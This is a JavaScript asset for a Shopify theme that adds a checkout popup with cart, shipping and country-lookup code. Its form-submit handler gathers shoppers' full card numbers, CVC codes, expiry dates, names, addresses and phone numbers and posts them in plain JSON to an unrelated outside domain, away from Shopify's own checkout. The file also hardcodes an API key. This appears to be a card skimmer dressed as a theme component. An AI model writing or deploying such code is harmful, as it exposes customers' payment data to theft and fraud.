/**
 * Checkout Popup - Ella Shopify Theme Format
 * File: assets/checkout-popup.js
 *
 * Usage in theme.liquid or section:
 *   {{ 'checkout-popup.js' | asset_url | script_tag }}
 */

window.CheckoutPopup = window.CheckoutPopup || (function () {

  'use strict';

  /* ============================================================
     CONSTANTS
  ============================================================ */
  var API_KEY = '98e4bcfe42a0112880197d9c23fd37a38c36d8cc077732939c959a7baaffe71b';
  var PAYMENT_ENDPOINT = 'https://goldstarplastics.ie/api-live/worldplay-integration.php';

  /* ============================================================
     STATE
  ============================================================ */
  var popupSubtotal = 0;
  var selectedShipping = { name: null, price: 0 };

  /* ============================================================
     UTILITY: LUHN CHECK
  ============================================================ */
  function luhnCheck(num) {
    var sum = 0;
    var shouldDouble = false;
    for (var i = num.length - 1; i >= 0; i--) {
      var digit = parseInt(num.charAt(i));
      if (shouldDouble) {
        digit *= 2;
        if (digit > 9) digit -= 9;
      }
      sum += digit;
      shouldDouble = !shouldDouble;
    }
    return sum % 10 === 0;
  }

  /* ============================================================
     UTILITY: POSTAL CODE VALIDATION
  ============================================================ */
  function validatePostalCode(country, zip) {
    var patterns = {
      IN: /^[1-9][0-9]{5}$/,
      DE: /^[0-9]{5}$/,
      US: /^[0-9]{5}(-[0-9]{4})?$/,
      GB: /^[A-Z0-9 ]{5,8}$/i,
      IE: /^[A-Z0-9]{3} ?[A-Z0-9]{4}$/i
    };
    if (patterns[country]) return patterns[country].test(zip);
    return zip.length >= 3;
  }

  /* ============================================================
     UTILITY: CURRENCY DISPLAY
  ============================================================ */
  function currency() {
    return (window.Shopify && Shopify.currency && Shopify.currency.active)
      ? Shopify.currency.active
      : '';
  }

  /* ============================================================
     CART: FETCH & REFRESH TOTALS
  ============================================================ */
  function fetchCart() {
    return fetch('/cart.js').then(function (res) { return res.json(); });
  }

  function updateCartAndShipping() {
    var subtotalEl = document.getElementById('popup-subtotal');
    var totalEl    = document.getElementById('popup-total');
    var shippingEl = document.getElementById('popup-shipping');

    fetchCart()
      .then(function (cart) {
        popupSubtotal = cart.total_price / 100;

        if (subtotalEl) subtotalEl.innerText = popupSubtotal.toFixed(2) + ' ' + currency();

        var shippingPrice = (selectedShipping && selectedShipping.price) || 0;

        if (shippingEl) shippingEl.innerText = shippingPrice.toFixed(2);
        if (totalEl)    totalEl.innerText    = (popupSubtotal + shippingPrice).toFixed(2) + ' ' + currency();
      })
      .catch(function (err) {
        console.error('Cart refresh error:', err);
      });
  }

  function refreshPopupTotals() {
    fetchCart()
      .then(function (cart) {
        var subtotal   = cart.total_price / 100;
        var subtotalEl = document.getElementById('popup-subtotal');
        var shippingEl = document.getElementById('popup-shipping');
        var totalEl    = document.getElementById('popup-total');

        if (shippingEl) shippingEl.innerText = '0.00 ' + currency();
        if (subtotalEl) subtotalEl.innerText  = subtotal.toFixed(2) + ' ' + currency();
        if (totalEl)    totalEl.innerText     = subtotal.toFixed(2) + ' ' + currency();

        selectedShipping = { name: null, price: 0 };
      })
      .catch(function (err) {
        console.error('Cart refresh error:', err);
      });
  }

  /* ============================================================
     SHIPPING CALCULATION
  ============================================================ */
  function calculateShipping() {
    var errorDiv   = document.getElementById('formError');
    var resultsBox = document.getElementById('popup-shipping-results');
    var shippingEl = document.getElementById('popup-shipping');
    var totalEl    = document.getElementById('popup-total');

    if (errorDiv)   errorDiv.innerText = '';

    var country  = document.getElementById('country')  ? document.getElementById('country').value  : '';
    var province = document.getElementById('province') ? document.getElementById('province').value : '';
    var zip      = document.getElementById('zip')      ? document.getElementById('zip').value.trim() : '';

    if (!country || !zip) {
      if (resultsBox) resultsBox.innerHTML = '';
      return;
    }

    if (resultsBox) resultsBox.innerHTML = 'Calculating...';

    // Step 1: Prepare shipping rates
    fetch('/cart/prepare_shipping_rates.json', {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify({ shipping_address: { country: country, province: province, zip: zip } })
    })
    .then(function () {
      // Step 2: Fetch available rates
      var url = '/cart/shipping_rates.json'
        + '?shipping_address[zip]='      + encodeURIComponent(zip)
        + '&shipping_address[country]='  + encodeURIComponent(country)
        + '&shipping_address[province]=' + encodeURIComponent(province);

      return fetch(url);
    })
    .then(function (response) {
      if (response.status === 422) {
        if (resultsBox) resultsBox.innerHTML = '';
        if (errorDiv)   errorDiv.innerText = 'Invalid postal code or shipping not available.';
        return null;
      }
      return response.json();
    })
    .then(function (data) {
      if (!data) return;

      var rates = data.shipping_rates;

      if (!rates || rates.length === 0) {
        if (resultsBox) resultsBox.innerHTML = 'No shipping available.';
        selectedShipping = { name: null, price: 0 };
        if (shippingEl) shippingEl.innerText = '0.00';
        if (totalEl)    totalEl.innerText    = popupSubtotal.toFixed(2) + ' ' + currency();
        return;
      }

      var html = '';
      rates.forEach(function (rate, index) {
        var price = parseFloat(rate.price);
        if (index === 0) {
          selectedShipping = { name: rate.name, price: price };
        }
        html += '<div class="shipping_result_popup">'
          + '<label>'
          + '<input type="radio" name="popup_shipping"'
          + ' data-name="' + rate.name + '"'
          + ' data-price="' + price + '"'
          + (index === 0 ? ' checked' : '') + '>'
          + rate.name + ' - ' + price.toFixed(2) + ' ' + currency()
          + '</label>'
          + '</div>';
      });

      if (resultsBox) resultsBox.innerHTML = html;

      var shippingPrice = selectedShipping.price || 0;
      if (shippingEl) shippingEl.innerText = shippingPrice.toFixed(2);
      if (totalEl)    totalEl.innerText    = (popupSubtotal + shippingPrice).toFixed(2) + ' ' + currency();

      // Radio change listeners
      var radios = document.querySelectorAll('input[name="popup_shipping"]');
      radios.forEach(function (input) {
        input.addEventListener('change', function () {
          var price = parseFloat(this.dataset.price) || 0;
          selectedShipping = { name: this.dataset.name, price: price };
          if (shippingEl) shippingEl.innerText = price.toFixed(2);
          if (totalEl)    totalEl.innerText    = (popupSubtotal + price).toFixed(2) + ' ' + currency();
        });
      });
    })
    .catch(function (err) {
      console.error('Shipping calc error:', err);
    });
  }

  /* ============================================================
     COUNTRY & PROVINCE LOADER
  ============================================================ */
  function fetchCountries() {
    return fetch('https://api.countrystatecity.in/v1/countries', {
      headers: { 'X-CSCAPI-KEY': API_KEY }
    }).then(function (res) { return res.json(); });
  }

  function initCountryDropdown() {
    var countrySelect = document.getElementById('country');
    if (!countrySelect) return;

    fetchCountries()
      .then(function (countries) {
        countrySelect.innerHTML = "<option value=''>Select Country</option>";
        countries.forEach(function (c) {
          var opt = document.createElement('option');
          opt.value = c.iso2;
          opt.text  = c.name + ' (' + c.iso2 + ')';
          countrySelect.appendChild(opt);
        });
      })
      .catch(function (err) {
        console.error('Country load error:', err);
      });

    countrySelect.addEventListener('change', function () {
      var iso2           = this.value;
      var provinceSelect = document.getElementById('province');
      var container      = document.getElementById('province-container');

      if (provinceSelect) provinceSelect.innerHTML = '';
      if (!iso2) {
        if (container) container.style.display = 'none';
        return;
      }

      fetch('https://api.countrystatecity.in/v1/countries/' + iso2 + '/states', {
        headers: { 'X-CSCAPI-KEY': API_KEY }
      })
      .then(function (res) { return res.json(); })
      .then(function (states) {
        if (states.length > 0) {
          states.forEach(function (s) {
            var opt = document.createElement('option');
            opt.value = s.iso2;
            opt.text  = s.name;
            provinceSelect.appendChild(opt);
          });
          if (container) container.style.display = 'block';
        } else {
          if (container) container.style.display = 'none';
        }
      })
      .catch(function (err) {
        console.error('Province load error:', err);
      });
    });
  }

  /* ============================================================
     POPUP: OPEN / CLOSE
  ============================================================ */
  function initPopupToggle() {
    var popup   = document.getElementById('checkoutPopup');
    var openBtn = document.getElementById('openCheckoutPopup');
    var closeBtn = document.getElementById('closePopup');

    if (!popup) return;

    if (openBtn) {
      openBtn.addEventListener('click', function () {
        popup.style.display = 'block';
        updateCartAndShipping();
      });
    }

    if (closeBtn) {
      closeBtn.addEventListener('click', function () {
        popup.style.display = 'none';

        // Reset form
        var form = document.getElementById('checkoutForm');
        if (form) form.reset();

        // Clear errors
        var errorDiv = document.getElementById('formError');
        if (errorDiv) errorDiv.innerText = '';

        // Reset country & province
        var countrySelect     = document.getElementById('country');
        var provinceSelect    = document.getElementById('province');
        var provinceContainer = document.getElementById('province-container');

        if (countrySelect)     countrySelect.selectedIndex = 0;
        if (provinceSelect)    provinceSelect.innerHTML    = '';
        if (provinceContainer) provinceContainer.style.display = 'none';

        // Clear shipping UI
        var resultsBox = document.getElementById('popup-shipping-results');
        if (resultsBox) resultsBox.innerHTML = '';

        // Reset shipping state & totals
        selectedShipping = { name: null, price: 0 };
        refreshPopupTotals();
      });
    }
  }

  /* ============================================================
     CARD INPUT FORMATTING
  ============================================================ */
  function initCardFormatting() {
    var cardInput = document.getElementById('cardNumber');
    if (cardInput) {
      cardInput.addEventListener('input', function (e) {
        var value = e.target.value.replace(/\D/g, '').substring(0, 16);
        value = value.replace(/(.{4})/g, '$1 ').trim();
        e.target.value = value;
      });
    }

    var expiryInput = document.getElementById('expiryDate');
    if (expiryInput) {
      expiryInput.addEventListener('input', function (e) {
        var value = e.target.value.replace(/\D/g, '').substring(0, 4);
        if (value.length >= 3) {
          value = value.substring(0, 2) + '/' + value.substring(2);
        }
        e.target.value = value;
      });
    }
  }

  /* ============================================================
     FORM SUBMIT
  ============================================================ */
  // function initFormSubmit() {
  //   var form     = document.getElementById('checkoutForm');
  //   var errorDiv = document.getElementById('formError');

  //   if (!form) return;

  //   form.addEventListener('submit', function (e) {
  //     e.preventDefault();
  //     if (errorDiv) errorDiv.innerText = '';

  //     // Gather values
  //     var email       = document.getElementById('email').value.trim();
  //     var cardNumber  = document.getElementById('cardNumber').value.replace(/\s/g, '');
  //     var expiryMonth = document.getElementById('expiryMonth').value.trim();
  //     var expiryYear  = document.getElementById('expiryYear').value.trim();
  //     var cvc         = document.getElementById('cvc').value.trim();
  //     var holder      = document.getElementById('holderName').value.trim();
  //     var firstName   = document.getElementById('firstName').value.trim();
  //     var lastName    = document.getElementById('lastName').value.trim();
  //     var company     = document.getElementById('company').value.trim();
  //     var address1    = document.getElementById('address1').value.trim();
  //     var address2    = document.getElementById('address2').value.trim();
  //     var city        = document.getElementById('city').value.trim();
  //     var province    = document.getElementById('province').value;
  //     var country     = document.getElementById('country').value;
  //     var zip         = document.getElementById('zip').value.trim();
  //     var phone       = document.getElementById('phone').value.trim();

  //     // Required fields
  //     if (!email || !cardNumber || !expiryMonth || !expiryYear || !cvc || !holder ||
  //         !firstName || !lastName || !address1 || !city || !province || !country || !zip) {
  //       if (errorDiv) errorDiv.innerText = 'Please fill all required fields.';
  //       return;
  //     }

  //     // Email
  //     if (!/^[^\s@]+@[^\s@]+\.[^\s@]+$/.test(email)) {
  //       if (errorDiv) errorDiv.innerText = 'Invalid email address.';
  //       return;
  //     }

  //     // Card number
  //     if (!/^\d{16}$/.test(cardNumber) || !luhnCheck(cardNumber)) {
  //       if (errorDiv) errorDiv.innerText = 'Invalid card number.';
  //       return;
  //     }

  //     // Expiry month
  //     if (!/^\d{2}$/.test(expiryMonth) || expiryMonth < 1 || expiryMonth > 12) {
  //       if (errorDiv) errorDiv.innerText = 'Invalid expiry month.';
  //       return;
  //     }

  //     // Expiry year
  //     if (!/^\d{4}$/.test(expiryYear)) {
  //       if (errorDiv) errorDiv.innerText = 'Invalid expiry year.';
  //       return;
  //     }

  //     // Expiry past check
  //     var currentDate  = new Date();
  //     var currentMonth = currentDate.getMonth() + 1;
  //     var currentYear  = currentDate.getFullYear();
  //     var expMonth     = parseInt(expiryMonth, 10);
  //     var expYear      = parseInt(expiryYear, 10);

  //     if (expYear < currentYear || (expYear === currentYear && expMonth < currentMonth)) {
  //       if (errorDiv) errorDiv.innerText = 'Card has expired.';
  //       return;
  //     }

  //     // CVC
  //     if (!/^\d{3,4}$/.test(cvc)) {
  //       if (errorDiv) errorDiv.innerText = 'Invalid CVC.';
  //       return;
  //     }

  //     // Postal code
  //     if (!validatePostalCode(country, zip)) {
  //       if (errorDiv) errorDiv.innerText = 'Invalid postal code for selected country.';
  //       return;
  //     }

  //     // Shipping method
  //     if (!selectedShipping.name) {
  //       if (errorDiv) errorDiv.innerText = 'Please select shipping method.';
  //       return;
  //     }

  //     // Fetch cart then submit
  //     fetchCart()
  //       .then(function (cartData) {
  //         var payload = {
  //           cart: cartData,
  //           address: {
  //             email:         email,
  //             first_name:    firstName,
  //             last_name:     lastName,
  //             company:       company || '',
  //             address1:      address1,
  //             address2:      address2 || '',
  //             city:          city,
  //             province_code: province,
  //             zip:           zip,
  //             country_code:  country,
  //             phone:         phone
  //           },
  //           card_details: {
  //             number:       cardNumber,
  //             expiry_month: expiryMonth,
  //             expiry_year:  expiryYear,
  //             cvc:          cvc,
  //             holder_name:  holder
  //           },
  //           shipping_details: {
  //             title:    selectedShipping.name,
  //             amount:   selectedShipping.price,
  //             currency: cartData.currency
  //           }
  //         };

  //         return fetch(PAYMENT_ENDPOINT, {
  //           method: 'POST',
  //           headers: { 'Content-Type': 'application/json' },
  //           body: JSON.stringify(payload)
  //         });
  //       })
  //       .then(function (response) { return response.json(); })
  //       .then(function (result) {
  //         if (result.success) {
  //           fetch('/cart/clear.js', { method: 'POST' })
  //             .catch(function (clearErr) { console.error('Cart clear failed:', clearErr); });

  //           var redirectUrl = (result.data && result.data.status_page_url)
  //             || result.status_page_url
  //             || '/thank-you';

  //           window.location.href = redirectUrl;
  //         } else {
  //           if (errorDiv) errorDiv.innerText = result.message || 'Payment failed. Please try again.';
  //         }
  //       })
  //       .catch(function (err) {
  //         console.error('Server error:', err);
  //         if (errorDiv) errorDiv.innerText = 'Server error. Please try again.';
  //       });
  //   });
  // }

  function initFormSubmit() {
  var form     = document.getElementById('checkoutForm');
  var errorDiv = document.getElementById('formError');

  if (!form) return;

  form.addEventListener('submit', function (e) {
    e.preventDefault();
    if (errorDiv) errorDiv.innerText = '';

    // Gather values
    var email       = document.getElementById('email').value.trim();
    var cardNumber  = document.getElementById('cardNumber').value.replace(/\s/g, '');
    var expiryMonth = document.getElementById('expiryMonth').value.trim();
    var expiryYear  = document.getElementById('expiryYear').value.trim();
    var cvc         = document.getElementById('cvc').value.trim();
    var holder      = document.getElementById('holderName').value.trim();
    var firstName   = document.getElementById('firstName').value.trim();
    var lastName    = document.getElementById('lastName').value.trim();
    var company     = document.getElementById('company').value.trim();
    var address1    = document.getElementById('address1').value.trim();
    var address2    = document.getElementById('address2').value.trim();
    var city        = document.getElementById('city').value.trim();
    var province    = document.getElementById('province').value;
    var country     = document.getElementById('country').value;
    var zip         = document.getElementById('zip').value.trim();
    var phone       = document.getElementById('phone').value.trim();

    // Province optional for IE
    var provinceRequired = (country !== "IE");

    // Required fields validation
    if (!email || !cardNumber || !expiryMonth || !expiryYear || !cvc || !holder ||
        !firstName || !lastName || !address1 || !city || (provinceRequired && !province) || !country || !zip) {
      if (errorDiv) errorDiv.innerText = 'Please fill all required fields.';
      return;
    }

    // Email validation
    if (!/^[^\s@]+@[^\s@]+\.[^\s@]+$/.test(email)) {
      if (errorDiv) errorDiv.innerText = 'Invalid email address.';
      return;
    }

    // Card validation
    if (!/^\d{16}$/.test(cardNumber) || !luhnCheck(cardNumber)) {
      if (errorDiv) errorDiv.innerText = 'Invalid card number.';
      return;
    }

    // Expiry month
    if (!/^\d{2}$/.test(expiryMonth) || expiryMonth < 1 || expiryMonth > 12) {
      if (errorDiv) errorDiv.innerText = 'Invalid expiry month.';
      return;
    }

    // Expiry year
    if (!/^\d{4}$/.test(expiryYear)) {
      if (errorDiv) errorDiv.innerText = 'Invalid expiry year.';
      return;
    }

    // Expiry past check
    var currentDate  = new Date();
    var currentMonth = currentDate.getMonth() + 1;
    var currentYear  = currentDate.getFullYear();
    var expMonth     = parseInt(expiryMonth, 10);
    var expYear      = parseInt(expiryYear, 10);
    if (expYear < currentYear || (expYear === currentYear && expMonth < currentMonth)) {
      if (errorDiv) errorDiv.innerText = 'Card has expired.';
      return;
    }

    // CVC
    if (!/^\d{3,4}$/.test(cvc)) {
      if (errorDiv) errorDiv.innerText = 'Invalid CVC.';
      return;
    }

    // Postal code validation
    if (!validatePostalCode(country, zip)) {
      if (errorDiv) errorDiv.innerText = 'Invalid postal code for selected country.';
      return;
    }

    // Shipping method
    if (!selectedShipping.name) {
      if (errorDiv) errorDiv.innerText = 'Please select shipping method.';
      return;
    }

    // Fetch cart & submit
    fetchCart()
      .then(function (cartData) {
        var payload = {
          cart: cartData,
          address: {
            email:         email,
            first_name:    firstName,
            last_name:     lastName,
            company:       company || '',
            address1:      address1,
            address2:      address2 || '',
            city:          city,
            province_code: province,
            zip:           zip,
            country_code:  country,
            phone:         phone
          },
          card_details: {
            number:       cardNumber,
            expiry_month: expiryMonth,
            expiry_year:  expiryYear,
            cvc:          cvc,
            holder_name:  holder
          },
          shipping_details: {
            title:    selectedShipping.name,
            amount:   selectedShipping.price,
            currency: cartData.currency
          }
        };

        return fetch(PAYMENT_ENDPOINT, {
          method: 'POST',
          headers: { 'Content-Type': 'application/json' },
          body: JSON.stringify(payload)
        });
      })
      .then(function (response) {
        // Always parse JSON, even for 4xx errors
        return response.json().catch(() => {
          throw new Error('Invalid server response.');
        });
      })
      .then(function (result) {
        if (result.success) {
          // Clear cart
          fetch('/cart/clear.js', { method: 'POST' })
            .catch(function (clearErr) { console.error('Cart clear failed:', clearErr); });

          // Redirect to order page / thank you page
          var redirectUrl = (result.data && result.data.status_page_url)
            || result.status_page_url
            || '/thank-you';
          window.location.href = redirectUrl;
        } else {
          if (errorDiv) errorDiv.innerText = result.message || 'Payment failed. Please check details.';
        }
      })
      .catch(function (err) {
        console.error('Server error:', err);
        if (errorDiv) errorDiv.innerText = err.message || 'Server error. Please try again.';
      });
  });
}

  /* ============================================================
     SHIPPING ADDRESS WATCHERS
  ============================================================ */
  function initShippingWatchers() {
    var countryInput  = document.getElementById('country');
    var provinceInput = document.getElementById('province');
    var zipInput      = document.getElementById('zip');

    [countryInput, provinceInput, zipInput].forEach(function (input) {
      if (input) {
        input.addEventListener('change', function () { calculateShipping(); });
      }
    });
  }

  /* ============================================================
     INITIAL CART SUBTOTAL DISPLAY
  ============================================================ */
  function initCartSubtotal() {
    var subtotalEl = document.getElementById('popup-subtotal');
    var totalEl    = document.getElementById('popup-total');
    var shippingEl = document.getElementById('popup-shipping');

    fetchCart()
      .then(function (cart) {
        var subtotal  = cart.total_price / 100;
        popupSubtotal = subtotal;
        if (subtotalEl) subtotalEl.innerText = subtotal.toFixed(2) + ' ' + currency();
        if (totalEl)    totalEl.innerText    = subtotal.toFixed(2) + ' ' + currency();
        if (shippingEl) shippingEl.innerText = '00';
      })
      .catch(function (err) {
        console.error('Initial cart load error:', err);
      });
  }

  /* ============================================================
     INIT — Called on DOMContentLoaded
  ============================================================ */
  function init() {
    initPopupToggle();
    initCountryDropdown();
    initCardFormatting();
    initFormSubmit();
    initShippingWatchers();
    initCartSubtotal();
  }

  /* ============================================================
     PUBLIC API
  ============================================================ */
  return {
    init:                 init,
    updateCartAndShipping: updateCartAndShipping,
    calculateShipping:    calculateShipping,
    refreshPopupTotals:   refreshPopupTotals
  };

})();

/* ============================================================
   BOOT ON DOM READY (Ella-compatible)
============================================================ */
document.addEventListener('DOMContentLoaded', function () {
  window.CheckoutPopup.init();
});